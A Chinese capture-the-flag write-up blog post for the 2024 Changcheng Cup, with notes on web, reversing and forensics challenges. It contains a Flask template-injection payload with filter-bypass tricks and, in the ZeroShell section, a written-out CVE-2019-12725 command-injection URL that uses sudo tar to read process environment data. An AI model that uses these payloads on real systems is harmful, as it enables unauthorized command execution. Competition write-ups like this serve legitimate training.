2024国赛_长城杯

比赛信息
题目状态
状态简写 | 状态 | 状态说明 |
---|---|---|
W | Wait | 没有人做这道题,你可以开始尝试 |
A | Active | 有人正在做这道题,你可以跟他进行交流 |
S | Stuck | 题目做到一半思路卡壳 |
F | Finished | 完成该题 |
F1 | Finish & First Blood | 完成并获得一血 |
F2 | Finish & Second Blood | 完成并获得二血 |
F3 | Finish & Third Blood | 完成并获得三血 |
FW | Finish & Lack WP | 完成并缺少 WP |
Web
hello_web
Safe_Proxy
这是一个 Flask 应用及其与反向代理的结合体
通过测试,发现{{()|attr('_class_')|attr('_mro_')|attr('_getitem_')(1)|attr('_subclasses_')()}}
可以注入成功,然后就可以利用这一串来构造
紧接着发现popen被过滤,给popen字符进行分割,"popen" -> "'po''pen'"
,
"__" -> "_''_"
接着分析,可以通过服务端响应时间来进行时间盲注,构造如下的时间盲注脚本
1 |
|
执行成功,获得flag
Re
ezCsky
rc4+xor
flag{d0f5b330-9a74-11ef-9afd-acde48001122}
elf32
ida打开,发现架构是ELF for Motorola M*Core (Executable)[elf64.dll]
ida9也没有这个架构
但是我们可以选择arm架构
反编译不完全
但能看到 check + xor function 并且看到strings flag处有着一大段data正好42位
很显然就是密文
968FB8085DA76844F2649264427A78E6EAC278B8639E5B3DD9283FC87306EE6B8D0C4BA323AECA40EDD1
同样flag处敏感字符串
密钥是 testkey
加密是rc4
发现swap()、rc4_init() 、 rc4_crtpt() 特征函数
还有xor
1 | enc = [ |
dump
附件给了个exe和flag
运行没东西
然后带上参数就可以运行了
发现输出的东西会和给出的flag文件比较
flag
正好对应上了23291e24
多次测试
所以我们可以写一个爆破脚本来爆破flag
题目提示flag len为22
掏出chatgpt,先给出个示范脚本跑起来,然后再调试,修改脚本
首先思路先1位1位的爆破,爆破1位,对比flag字节
比如说flag{ 之后就是0e
发现可行
依次测试
优化后,一次可以找到6位
如下
从而得出最后答案
flag{MTczMDc4MzQ2Ng==}
flag{MTczMDc0MzQ2Ng==}
发现最后答案是4
1 | import subprocess |
Misc
pwn
威胁分析
zeroshell_1
1
2
用r-studio直接看vmdk文件
3
wireshark抓vmware net8网卡的包
4
1 | # CVE-2019-12725 - ZeroShell 3.9.0 and below Remote Command Execution as Root (PoC) |
netstat -anp 轮询下获取
根据pid查进程
次数用完了 damn
/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A/etc/sudo%20tar%20-cf%20/dev/null%20/dev/null%20–checkpoint=1%20–checkpoint-action=exec=%27cat%20/proc/10657/environ%27%0A%27
木马是 .nginx
然后把.nginx下载下来
5、
直接strings找到奇怪的字符串
11223344qweasdzxc
6
读木马的proc下的 environ
flag{/var/register/system/startup/scripts/nat/File}
WinFT
1
查看本地dns缓存
2
打开计划任务管理器
5
wireshark导出所有http对象,
有个server,后面加个zip后缀,hex为有个字符串,base64解密拿到zip的密码
- Title: 2024国赛_长城杯
- Author: luyanpei
- Created at : 2025-04-15 13:07:05
- Updated at : 2025-04-20 13:27:54
- Link: https://redefine.ohevan.com/2025/04/15/2024国赛_长城杯/
- License: All Rights Reserved © luyanpei